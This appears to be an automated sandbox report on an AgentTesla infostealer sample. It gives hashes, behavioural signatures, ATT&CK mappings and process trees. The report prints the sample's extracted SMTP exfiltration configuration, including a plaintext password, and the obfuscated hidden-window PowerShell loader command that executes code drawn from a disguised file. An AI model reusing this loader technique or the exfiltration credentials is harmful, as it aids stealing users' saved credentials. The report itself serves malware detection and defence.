Analysis
-
max time kernel
144s -
max time network
152s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
16/10/2024, 01:26
Static task
static1
Behavioral task
behavioral1
Sample
964b626022ea083fe9624f88d0371fa01fb6b3b4fa081e880d88a05bbf0654b3.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
964b626022ea083fe9624f88d0371fa01fb6b3b4fa081e880d88a05bbf0654b3.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral3
Sample
Haarvksten/Nomenklaturerne.ps1
Resource
win7-20241010-en
Behavioral task
behavioral4
Sample
Haarvksten/Nomenklaturerne.ps1
Resource
win10v2004-20241007-en
General
-
Target
964b626022ea083fe9624f88d0371fa01fb6b3b4fa081e880d88a05bbf0654b3.exe
-
Size
666KB
-
MD5
0cc41f127fab597085bc6125dfc809f2
-
SHA1
1e36ce6c9d40f959628739b740e4e30cd4afa0b7
-
SHA256
964b626022ea083fe9624f88d0371fa01fb6b3b4fa081e880d88a05bbf0654b3
-
SHA512
2482ec6a288163d8fd55abced05ba885c65f88fc5b5de8bc81a987bd25dd855de2f22428125f264dec9a6ab3ffb7d8b55339147c68642a1bac6c37832e1a7e15
-
SSDEEP
12288:ONBi378Ezq6mFhbL5RGDuLHsomyplHD1YE5c9dJmsOZAjGQB7F0PgvD5Fb7E:ONg37Hq6iNLGsHcejj5c96ZOGQMPgNpE
Malware Config
Extracted
agenttesla
Protocol: smtp- Host:
smtp.ionos.es - Port:
587 - Username:
[email protected] - Password:
luiyis353173 - Email To:
[email protected]
Signatures
-
AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
-
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
pid Process 220 powershell.exe 536 powershell.exe -
Loads dropped DLL 2 IoCs
pid Process 4640 Forskelsbehandlende.exe 5116 Forskelsbehandlende.exe -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
flow ioc 23 drive.google.com 24 drive.google.com 25 drive.google.com -
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
pid Process 4640 Forskelsbehandlende.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs
pid Process 536 powershell.exe 220 powershell.exe 4640 Forskelsbehandlende.exe 5116 Forskelsbehandlende.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 5 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 964b626022ea083fe9624f88d0371fa01fb6b3b4fa081e880d88a05bbf0654b3.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Forskelsbehandlende.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Forskelsbehandlende.exe -
Suspicious behavior: EnumeratesProcesses 20 IoCs
pid Process 220 powershell.exe 220 powershell.exe 536 powershell.exe 536 powershell.exe 536 powershell.exe 536 powershell.exe 536 powershell.exe 220 powershell.exe 220 powershell.exe 220 powershell.exe 536 powershell.exe 536 powershell.exe 536 powershell.exe 220 powershell.exe 220 powershell.exe 220 powershell.exe 220 powershell.exe 536 powershell.exe 4640 Forskelsbehandlende.exe 4640 Forskelsbehandlende.exe -
Suspicious behavior: MapViewOfSection 2 IoCs
pid Process 536 powershell.exe 220 powershell.exe -
Suspicious use of AdjustPrivilegeToken 45 IoCs
description pid Process Token: SeDebugPrivilege 220 powershell.exe Token: SeDebugPrivilege 536 powershell.exe Token: SeIncreaseQuotaPrivilege 536 powershell.exe Token: SeSecurityPrivilege 536 powershell.exe Token: SeTakeOwnershipPrivilege 536 powershell.exe Token: SeLoadDriverPrivilege 536 powershell.exe Token: SeSystemProfilePrivilege 536 powershell.exe Token: SeSystemtimePrivilege 536 powershell.exe Token: SeProfSingleProcessPrivilege 536 powershell.exe Token: SeIncBasePriorityPrivilege 536 powershell.exe Token: SeCreatePagefilePrivilege 536 powershell.exe Token: SeBackupPrivilege 536 powershell.exe Token: SeRestorePrivilege 536 powershell.exe Token: SeShutdownPrivilege 536 powershell.exe Token: SeDebugPrivilege 536 powershell.exe Token: SeSystemEnvironmentPrivilege 536 powershell.exe Token: SeIncreaseQuotaPrivilege 220 powershell.exe Token: SeRemoteShutdownPrivilege 536 powershell.exe Token: SeSecurityPrivilege 220 powershell.exe Token: SeUndockPrivilege 536 powershell.exe Token: SeManageVolumePrivilege 536 powershell.exe Token: 33 536 powershell.exe Token: SeTakeOwnershipPrivilege 220 powershell.exe Token: 34 536 powershell.exe Token: SeLoadDriverPrivilege 220 powershell.exe Token: 35 536 powershell.exe Token: SeSystemProfilePrivilege 220 powershell.exe Token: 36 536 powershell.exe Token: SeSystemtimePrivilege 220 powershell.exe Token: SeProfSingleProcessPrivilege 220 powershell.exe Token: SeIncBasePriorityPrivilege 220 powershell.exe Token: SeCreatePagefilePrivilege 220 powershell.exe Token: SeBackupPrivilege 220 powershell.exe Token: SeRestorePrivilege 220 powershell.exe Token: SeShutdownPrivilege 220 powershell.exe Token: SeDebugPrivilege 220 powershell.exe Token: SeSystemEnvironmentPrivilege 220 powershell.exe Token: SeRemoteShutdownPrivilege 220 powershell.exe Token: SeUndockPrivilege 220 powershell.exe Token: SeManageVolumePrivilege 220 powershell.exe Token: 33 220 powershell.exe Token: 34 220 powershell.exe Token: 35 220 powershell.exe Token: 36 220 powershell.exe Token: SeDebugPrivilege 4640 Forskelsbehandlende.exe -
Suspicious use of WriteProcessMemory 14 IoCs
description pid Process procid_target PID 1896 wrote to memory of 220 1896 964b626022ea083fe9624f88d0371fa01fb6b3b4fa081e880d88a05bbf0654b3.exe 84 PID 1896 wrote to memory of 220 1896 964b626022ea083fe9624f88d0371fa01fb6b3b4fa081e880d88a05bbf0654b3.exe 84 PID 1896 wrote to memory of 220 1896 964b626022ea083fe9624f88d0371fa01fb6b3b4fa081e880d88a05bbf0654b3.exe 84 PID 1896 wrote to memory of 536 1896 964b626022ea083fe9624f88d0371fa01fb6b3b4fa081e880d88a05bbf0654b3.exe 89 PID 1896 wrote to memory of 536 1896 964b626022ea083fe9624f88d0371fa01fb6b3b4fa081e880d88a05bbf0654b3.exe 89 PID 1896 wrote to memory of 536 1896 964b626022ea083fe9624f88d0371fa01fb6b3b4fa081e880d88a05bbf0654b3.exe 89 PID 536 wrote to memory of 4640 536 powershell.exe 92 PID 536 wrote to memory of 4640 536 powershell.exe 92 PID 536 wrote to memory of 4640 536 powershell.exe 92 PID 536 wrote to memory of 4640 536 powershell.exe 92 PID 220 wrote to memory of 5116 220 powershell.exe 93 PID 220 wrote to memory of 5116 220 powershell.exe 93 PID 220 wrote to memory of 5116 220 powershell.exe 93 PID 220 wrote to memory of 5116 220 powershell.exe 93
Processes
-
C:\Users\Admin\AppData\Local\Temp\964b626022ea083fe9624f88d0371fa01fb6b3b4fa081e880d88a05bbf0654b3.exe"C:\Users\Admin\AppData\Local\Temp\964b626022ea083fe9624f88d0371fa01fb6b3b4fa081e880d88a05bbf0654b3.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1896 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -windowstyle hidden "$Witnesseth=Get-Content -raw 'C:\Users\Admin\AppData\Local\Skaberkrfters\Klembt\indgivelsers\Haarvksten\Nomenklaturerne.Bac';$Pinkwort=$Witnesseth.SubString(54335,3);.$Pinkwort($Witnesseth)"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:220 -
C:\Users\Admin\AppData\Local\Temp\Forskelsbehandlende.exe"C:\Users\Admin\AppData\Local\Temp\Forskelsbehandlende.exe"3⤵
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:5116
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -windowstyle hidden "$Witnesseth=Get-Content -raw 'C:\Users\Admin\AppData\Local\Skaberkrfters\Klembt\indgivelsers\Haarvksten\Nomenklaturerne.Bac';$Pinkwort=$Witnesseth.SubString(54335,3);.$Pinkwort($Witnesseth)"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:536 -
C:\Users\Admin\AppData\Local\Temp\Forskelsbehandlende.exe"C:\Users\Admin\AppData\Local\Temp\Forskelsbehandlende.exe"3⤵
- Loads dropped DLL
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4640
-
-
Network
MITRE ATT&CK Enterprise v15
Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
4Credentials In Files
3Credentials in Registry
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
854B
MD5e935bc5762068caf3e24a2683b1b8a88
SHA182b70eb774c0756837fe8d7acbfeec05ecbf5463
SHA256a8accfcfeb51bd73df23b91f4d89ff1a9eb7438ef5b12e8afda1a6ff1769e89d
SHA512bed4f6f5357b37662623f1f8afed1a3ebf3810630b2206a0292052a2e754af9dcfe34ee15c289e3d797a8f33330e47c14cbefbc702f74028557ace29bf855f9e
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA
Filesize1KB
MD5637dde667e8c09040c9cb4fc14298361
SHA1d4490679974d9b291ec0bd8e16b80e5a2931876b
SHA256b550811d4bab68823c7a9083a0e5b48f0ecb3152c721b252f656e0ac41d6a192
SHA5124ff62e05f8df63ea05775e18531f42ec0a99407c6cadd87eab1322d248023ccd536715fb87ff2095c84b00fe8dc9ccc37f30eb10a05aa1c9c6b14b84b78d2fc7
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\6DA548C7E5915679F87E910D6581DEF1_831B21EC05D416A4ADB2370CD79ABCDD
Filesize471B
MD544bd7788636834199734c4641de38443
SHA13884ce3fff582e1c0b63cf0da8f1de0da5f71902
SHA2562fd9882432710b0bcde151bbace2b764fbc71531f5f2890fa228394f834d9637
SHA51252106319011c2c0683074e5d3d150d1c6d20033d0842657f50fae810821576786f57b508a4e4e35f04448db83c809af36d4171e50b12764a494fe43fd4e2b5e3
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C02877841121CC45139CB51404116B25_CFDBFDB29AA6A71EBDC3E04CD6E276F4
Filesize472B
MD590cfbca46c0f7a3eb1d646b5306d0746
SHA11b3a3d25cfbadf2ec2668cefd7fc18ec621f4c2c
SHA256b7f9b0e7966a88533d471a7fc3f0dfe7122e7fa05b82d91232e4b738248c3ea3
SHA512a749878454ed00b126126e0334ff05b457a43894143741a0bcf7aa402a3c68f5d5c0e206208cfc579ebce4f57be932c135424529fc91db9a6164fc9bd8a86f10
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\05DDC6AA91765AACACDB0A5F96DF8199
Filesize170B
MD56f3d0ec4f494a0a09d806f52bf0044f6
SHA1429b79ad354dc3ee104ad247603f138c21174737
SHA2569be066415f7e235407634ddf433e2d6c0ff5686134c52831d39a54eb04772cad
SHA512d2b05c9b6259370cec770fdb340c74c1c130aa02163ec757bf644925db926dd59eed1d709b3d1f8d7a3af2d6fa1067a654e6ad233bdd7155af3a7309955bd64a
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA
Filesize410B
MD57dee3b7862f2789e5543fe29f6066919
SHA1cd742325dc7feba7ad1f67b5dcf24136662e04c6
SHA25678990e925e9b71b1589a9d9b88e31532629b335a0996d1ac725ab073e94a3aa5
SHA5120f3a44e6160eb497e492b8dd339932e41dc96f1c77f8680ce160dc572b72fc5b1aaf48b4a08fbf37ed02cd58a9dafe1f75456c188406ad62c092a2e68cbf05ab
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6DA548C7E5915679F87E910D6581DEF1_831B21EC05D416A4ADB2370CD79ABCDD
Filesize402B
MD5fdee58539809c7459f6555db3efc55bc
SHA116d8127169073e2d8f5aa3551e57c3585e14e53e
SHA256756ababbb122b9858b6a891ad31fb8d5ecb881f83aac28ef1463fd18983a0fb9
SHA5121692182c8116280c54134b00e5b1bcff257590753c2d9f12753edc610ef3f21bfb82e79ab5f832ab47e4bbe4ae2a16af94d8c85f7d4425148fbbf4283ac9acb7
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\C02877841121CC45139CB51404116B25_CFDBFDB29AA6A71EBDC3E04CD6E276F4
Filesize398B
MD55196a2d0eeaeeb0ae207351c31de8572
SHA1e519b3dbefed375d6ed70db7be00812effa21737
SHA256499fbe3734172c65187b7d658743dce99538e000f16cdfd5c004840d0d78bee9
SHA5123e2ff847f3b4b5542930fdeecf677420e44026161b5ae30f03237f0b2aec920299fab141587c87e56f3078c2d38e87c845bb599c9d85562b111dd370b65bd986
-
Filesize
53KB
MD501404e51f6442f60e478c306b1e6e52e
SHA137f234ccf5611b8309023410ceb9e76ad81f5678
SHA256d4356dd23aa2e811712132f9718786331661a1bd0d062c49cb76807b9563928b
SHA51294a9d843ae4055e2a9b412f03cba85e2d7b804ec3106f059d14ca50b15ae4acc6cd452f9461c2e21d1632d06848c969732c539aea17869b8b3a2f5ab93b891d7
-
Filesize
53KB
MD567517d72ac10b11f81aa07fc2f994275
SHA171d255f09b46f34093786eec160120e6383b2f8c
SHA2560af4117e1ded224818ab4c741022f2179af74cc0cf9fcc640efb73746baf4fe4
SHA5121c1054233b654d8831c114b0f009a095a49c8805b13a2d756e5eedec477cddb2608ed0012b040a8736916e3226a5aebb4425eb6f3ee02e4338afe9816b923afe
-
Filesize
342KB
MD55f9b9deef4ab85e8c6488e1c0f7c0166
SHA122ded843370b80440148b1f054cb02c209bb0335
SHA2563641dbef493712c13358f8a92c87585995ed79e7bc449379c6d1b7915e55e735
SHA512bd54694e3b8883b1d90eefd4dc1e42c8d2406269b27999c4199cb2cc70eb00b61ba9e41ef6782fa38719dd8bae17ca66731b8002714abceacc34068bc054f0b7
-
Filesize
666KB
MD50cc41f127fab597085bc6125dfc809f2
SHA11e36ce6c9d40f959628739b740e4e30cd4afa0b7
SHA256964b626022ea083fe9624f88d0371fa01fb6b3b4fa081e880d88a05bbf0654b3
SHA5122482ec6a288163d8fd55abced05ba885c65f88fc5b5de8bc81a987bd25dd855de2f22428125f264dec9a6ab3ffb7d8b55339147c68642a1bac6c37832e1a7e15
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82